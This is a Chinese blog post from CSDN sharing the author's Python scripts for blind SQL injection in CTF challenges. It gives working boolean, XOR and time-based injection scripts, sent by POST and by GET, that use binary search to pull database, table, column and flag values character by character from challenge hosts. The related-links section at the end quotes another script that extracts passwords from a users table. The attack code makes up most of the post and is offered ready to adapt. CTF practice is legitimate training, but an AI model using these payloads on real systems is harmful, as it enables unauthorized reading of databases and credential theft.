ctf各种sql盲注脚本

已于 2023-05-29 01:39:37 修改
阅读量2.8k 收藏 38
点赞数 10
分类专栏: CTF 文章标签: python mysql sql
于 2021-08-17 22:01:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51862722/article/details/119767131
版权

以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼

核心算法都是二分法,不推荐时间盲注(速度硬伤)

脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极客大挑战finilysql(buuctf)

1.通过post传参的脚本

用的时候修改post参数和个数

1.1 基于异或盲注布尔盲注等:

import requests

url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''

for i in range(1, 1000):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or ascii(substr(database(),{i},1))>{mid}#"    #查库
        #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#"   #查表
        #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#"   #查列
        payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#"   #查数据
        data = {
            "name":payload,
            "pass":'qwer'
        }
        response = requests.post(url, data = data)
        if 'u6216' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2       
    if low != 32 :
        flag += chr(int(low))
    else:
        break
    print(flag)

1.2 基于时间盲注

import requests
import time

url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''

for i in range(1,1000):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#"       #查库名
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#"        #查表名
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#"        #查列名
        payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"       #查数据
        data = {
            "name":payload,
            "pass":'qwer'
        }        
        last = int(time.time())
        response = requests.post(url, data = data)
        now = int(time.time())
        if now - last > 1 :    
            low = mid + 1
        else :
            high = mid
        mid = (low + high) // 2 
    if low != 32 :
        flag += chr(int(low))
    else:
        break
    print(flag)

2.通过get传参的脚本

修改url 和 文本

2.1 基于异或盲注,布尔盲注等:

import requests

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''

for i in range(1,1000):
    min = 32
    max = 128
    while min<max:
        mid = (min + max) // 2
        payload=f"1^(ascii(substr(database(),{i},1))>{mid})#"       #查库名
        #payload=f"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{i},1))>{mid})#"        #查表名
        #payload=f"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),{i},1))>{mid})#"      #查列名
        #payload=f"1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})#"       #查数据
        response=requests.get(url=url+payload)
        if 'ERROR' in response.text:
            min = mid + 1
        else:
            max=mid
    if min != 32 :
        name += chr(min)
    else:
        break
    print(name)

2.2 基于时间盲注:

import requests
import time 

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''

for i in range(1,1000):
    min = 32
    max = 128
    while min<max:
        mid = (min + max) // 2
        payload=f" "       #查库名
        #payload=f" "        #查表名
        #payload=f" "      #查列名
        #payload=f" "       #查数据
        last = int(time.time())
        response=requests.get(url=url+payload)
        now = int(time.time())
        if now - last > 1:
            min = mid + 1
        else:
            max=mid
    if min != 32 :
        name += chr(min)
    else:
        break
    print(name)

3.备注

1.payload不放了,这个做题慢慢积累,网上也都有,根据题目自己写

2.能不使用sleep就不使用,速度比其他的方法慢太多

3.在网不好的情况下可能会出现脚本打印的字符错误,不是代码问题

4.自己写的脚本可能不完善,有问题或者有建议留言,有需求也可以自改

5.遇到新的脚本或者方法再补充

F4NQ1E
关注
  • 10
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入之盲注(小白的学习)
lgsyydsa的博客
06-04 576
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL盲注python脚本自动化注入
菜鸟学安全的博客
12-18 1375
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 417
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
CTFCTFshow-SQL注入(持续更新)
qq_53099119的博客
06-21 498
CTFshow sql
要写脚本,编程不好不要紧--浅谈CTF脚本的编写方法
Eason_LYC安全白帽子的成长博客
08-08 3706
CTF脚本的编制,没有大家想象的那么难。真正难得地方是思路,是找到破题点。如果基础较弱,在日常CTF学习中,遇到不明白的函数,随遇随学,多记套路用法即可。不断练习已经理解的脚本,不断重温新学的函数,写的多,自然就入门了。等真正有时间,再系统学习一门编程语言即可。个人经验,为了学习而学习,永远学不好。为了一个目标,用“偷懒”的办法,学以致用,不断巩固练习,效果反而好。...
sql盲注python脚本
weixin_48266255的博客
08-29 453
【代码】sql盲注python脚本
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本SQL盲注脚本,编码加解密神器
12-29
在这个特定的压缩包文件中,包含了一系列用于CTF的工具和脚本,主要涉及到古典加解密、RSA算法、SQL注入攻击的盲注技术以及编码和解密的实用工具。 首先,让我们详细讨论一下这些关键知识点: 1. **古典加解密...
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctf脚本_ctfpy脚本_ctf脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
ctfsql注入——基于时间的盲注
wlllllianqing的博客
09-18 799
基于时间的盲注 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
CTF-RSA_基础题目及脚本
fengerxi33的博客
02-18 4548
CTF-RSA_基础题目及脚本 随机生成flag import random import hashlib import string #字符串列表 a=string.printable #随机生成flag for i in range(10): flag = "" for i in range(10): flag += a[random.randint(0, 99)] flag = hashlib.md5(flag.encode()).hexdigest()
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 686
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
CTFHub SQl注入 时间盲注sqlmap)
赤城封雪的博客
08-07 5003
CTFHub SQl注入 时间盲注sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
CTFer成长之路之CTF中的SQL注入
自强不息
02-20 1502
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(1)
m0_61072747的博客
04-07 1072
参考:https://blog.csdn.net/qq_44657899/article/details/10323914。
CTF-Web16(涉及布尔盲注脚本以及waf过滤等,难度较大)
→_→
09-16 690
16.认真一点 分析: POST提交 id=1 显示Youarein................ id=0 显示Youarenotin............... 有区别就好做了,随便输入id=1pcatissocoooooooooool还是回显Youarein 说明这是字符型注入,1开头的字符串被弱类型等于1,输入id=1'显示Youarenotin,就庆幸了,因为说明单引号没被转义(若是转义了,就应该显示Youarein)。这里作为一名ctfer,有 种直觉就是会有waf,于是PO.
python写一个sql盲注脚本
05-01
以下是一个基本的 Python SQL 盲注脚本,它可以用于测试 SQL 注入攻击: ```python import requests # 目标URL url = "http://example.com/login.php" # 注入参数 injection_param = "username" # 注入语句 injection_statement = "' or 1=1#" # 发送请求并检查响应 def check_response(response): if "登录成功" in response.text: return True else: return False # 枚举字符 def enum_chars(): for i in range(32, 127): injection_payload = injection_statement.replace("1=1", f"ascii(substring((select password from users where id=1), 1, 1))={i}") data = {injection_param: injection_payload} response = requests.post(url, data=data) if check_response(response): print(chr(i), end="") # 枚举长度 def enum_length(): length = 0 while True: injection_payload = injection_statement.replace("1=1", f"length((select password from users where id=1))={length}") data = {injection_param: injection_payload} response = requests.post(url, data=data) if check_response(response): return length length += 1 # 枚举内容 def enum_content(): password_length = enum_length() password = "" for i in range(1, password_length+1): for j in range(32, 127): injection_payload = injection_statement.replace("1=1", f"ascii(substring((select password from users where id=1), {i}, 1))={j}") data = {injection_param: injection_payload} response = requests.post(url, data=data) if check_response(response): password += chr(j) break print("Password:", password) # 枚举密码 enum_content() ``` 这是一个基本的脚本,它可以枚举数据库中的密码。请注意,这只是一个简单的演示,实际上,SQL 注入攻击可能需要更复杂的技术。此外,SQL 注入是非常危险的攻击,如果您不知道自己在做什么,请不要尝试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值